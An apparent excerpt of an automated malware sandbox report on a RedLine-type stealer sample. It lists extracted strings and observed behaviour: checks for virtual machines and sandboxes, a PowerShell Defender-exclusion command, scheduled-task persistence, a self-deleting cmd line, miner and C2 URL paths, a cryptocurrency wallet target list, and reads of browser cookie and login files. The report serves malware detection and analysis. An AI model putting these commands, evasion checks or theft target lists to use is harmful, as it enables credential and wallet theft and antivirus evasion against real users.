Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SbieDll.dllcmdvrt32.dllcmdvrt64.dllSxIn.dllcuckoomon.dllkernel32.dllwine_get_unix_file_nameSelect * from Win32_ComputerSystemManufacturerModelmicrosoft corporationVIRTUALvmwareballoon.netkvm.vioinputviofs.vioser.*vmbusVMBusHIDhyperkbdJohn DoeMillermalwareCurrentUserSandboxJohnsonWDAGUtilityAccountVBoxMouse.VBoxGuest.VBoxSF.VBoxVideo.vmmouse.vboxogl.dllVMwareOracleVirtualBox Guest AdditionsvboxserviceVGAuthServicevmusrvcqemu-gaSELECT * FROM Win32_PortConnector WHERE PNPDeviceID IS NOT NULLPNPDeviceIDACPI\PNP0501ACPI\PNP0502sysCritical Error1powershellrunas -Command Add-MpPreference -ExclusionPath '{0}'On0\screen.jpgscreen\.jpghashcum/get.phpPOST15sec30secrandom/zima.php?mine=ifelsexmrverusxmr+verusravenetcverus+ravenverus+etcxmr+ravenxmr+etcautoabcdefghjklmnoWin32_ProcessorProcessorId-Win32_BIOSSerialNumberWin32_DiskDriveSignatureWin32_BaseBoardWin32_VideoControllerNamex20x0000100x0000110x0000120x0000130x0000140x0000150x0000160x0000170x0000180x0000190x0000200x0000210x000022Select * from Win32_ProcessorNumberOfCoresPhormMid.croot\CIMV2SELECT Name FROM Win32_ProcessorUnknown.SELECT TotalPhysicalMemory FROM Win32_ComputerSystemTotalPhysicalMemoryMBSELECT * FROM Win32_VideoControllerAdapterRam bytes, Caption{0} | {1}amdnvidiaintel(r){1}.root\SecurityCenterroot\SecurityCenter2SELECT * FROM AntivirusProductdisplayName, nonecpugpuramtagifelseldav/beep.phpfilezidBEBRIK.php.bat@echo offtimeout 3 > NULSTART "" ""CD DEL "" /f /qSoftware\Microsoft\Windows\CurrentVersion\Run\c2NodGFza3MuZXhl/create /sc MINUTE /mo 3 /tn "" /tr "" /fcmd/c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "/zima.php?mine=loader;yesnoSELECT CommandLine FROM Win32_Process WHERE ProcessId = 
CommandLineWin64uninstall.datMaZriCy9x3PTU2izdrO5UXbB6/ak0/HTSOSORRY.phpEOK.phpTOKYO.phpCHECK.phpOperaApp.datopera.datoperaupdater.datfirefox.dathelper.datZUHAN.exeWinForm.csZUHAN1264417905Program.csgetIQZuTsZDjUKE1BSBeT3eI2eNppHhTxrWHVRLTV+qqKRJfXz5YF6S4CcPXuxRE4gseXBURQy1iXbjM+H+NKkuXWDRKMShJJwZCKO9RytWz/5ZdYLrQZyzku1AQmyRjIiC5e1eA04pvrZro/7AHRKiZQ==Ybm4nNGEQQFuiwzVAnwg2oKZNBNG1Pg7s41+NkV0iE1YLnnXKndzwHC9OqR3X989tOJKaX+Vqz8j9MEC90wkEdp6Jf6k5I0KUs3KC3p7w5HWUIy2VybMXlvQVOxy4hzSkF6rsY8Edb9JvHItI1ogEBe7LPINPvdCPlNO7bA9H4pUee1omVXibOAxodmcNZYXh2WBLTmBMLyziyryS2x1W2sHQjv9mELHoexPN0wVwTzPMNWfit4EsVd8kbOQvN+cwz8wpHfkNldOXz9xAoaXj/wKfjNCkyytKClPPn6mQoN47qFu6FNCRfjl0WKAjUbtHw2jI1/J5uqNjl+XNnJzxlRomyc3pN0Hg+S0i2F7Y4wHxX4HTFFK4TLiGGe9ieHVQfUtXCXgEKIPb3qa29LGsg==[CHECK]http://185.209.162.40/apocalypseRussia,Georgia,Belarus,Armenia,Russia,Belarus,Azerbaijan,Kazakhstan,Kyrgyzstan,Armenia,Uzbekistan,Tajikistan Ef+uVd02PT3LwIeMBag5ow==onvbc.exe/zima.php?mine=XMR/zima.php?mine=OTHERgeneratorgenapzxdatid=application/x-www-form-urlencoded//RegSvcs.exe/zima.php?mine=RAVENngen.exe/zima.php?mine=ETC
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxmouse.sys@n
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0Gb
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: !Hyper-V PowerShell Direct Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: qemu-ga
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxGuest.
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmusrvc
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Hyper-V Time Synchronization Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015BA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: c:\program files\vmware
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000167F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\swqyH
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxGuest.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VBoxSF.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: $Hyper-V Volume Shadow Copy Requestor0
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxguest.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmmouse.sys
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.000000000459A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vboxsf.sys@n
Source: CAFIJKFHIJ.exe, 00000009.00000002.2065130719.0000000004451000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F62219 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F62219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004185A0 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_004185A0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F674F4 mov ecx, dword ptr fs:[00000030h] 0_2_00F674F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F6BC8B mov eax, dword ptr fs:[00000030h] 0_2_00F6BC8B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F6C701 GetProcessHeap, 0_2_00F6C701
Source: C:\ProgramData\CAFIJKFHIJ.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F62375 SetUnhandledExceptionFilter, 0_2_00F62375
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F64A20 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00F64A20
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F61D93 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00F61D93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041A68F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0041A68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041F768 SetUnhandledExceptionFilter, 3_2_0041F768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0041BBB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_0041BBB7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C82B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6C82B66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C82B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6C82B1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C9DAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6C9DAC62
Source: C:\ProgramData\CAFIJKFHIJ.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00FAE7B5 CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,TerminateProcess,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread, 0_2_00FAE7B5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00411BD0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, 3_2_00411BD0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 423000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 642000
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 1022008
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\CAFIJKFHIJ.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ProgramData\CAFIJKFHIJ.exe "C:\ProgramData\CAFIJKFHIJ.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F62485 cpuid 0_2_00F62485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 3_2_00410370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: GetLocaleInfoA,LocalFree, 3_2_004103E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\CAFIJKFHIJ.exe Queries volume information: C:\ProgramData\CAFIJKFHIJ.exe VolumeInformation
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe Code function: 0_2_00F62106 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00F62106
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00410220 GetProcessHeap,HeapAlloc,GetUserNameA, 3_2_00410220
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00410300 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA, 3_2_00410300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: RegAsm.exe, 00000003.00000002.2042222099.000000000167F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 9.0.CAFIJKFHIJ.exe.d00000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000009.00000000.1988827783.0000000000D02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft123[1].exe, type: DROPPED
Source: Yara match File source: C:\ProgramData\CAFIJKFHIJ.exe, type: DROPPED
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe.f60000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2042222099.0000000001654000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1632010609.0000000000F7B000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2039734186.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exe PID: 6016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 7056, type: MEMORYSTR
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000003.00000002.2042222099.00000000015B0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: RegAsm.exe, 00000003.00000002.2039734186.0000000000434000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: Exodus Web3 Wallet
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
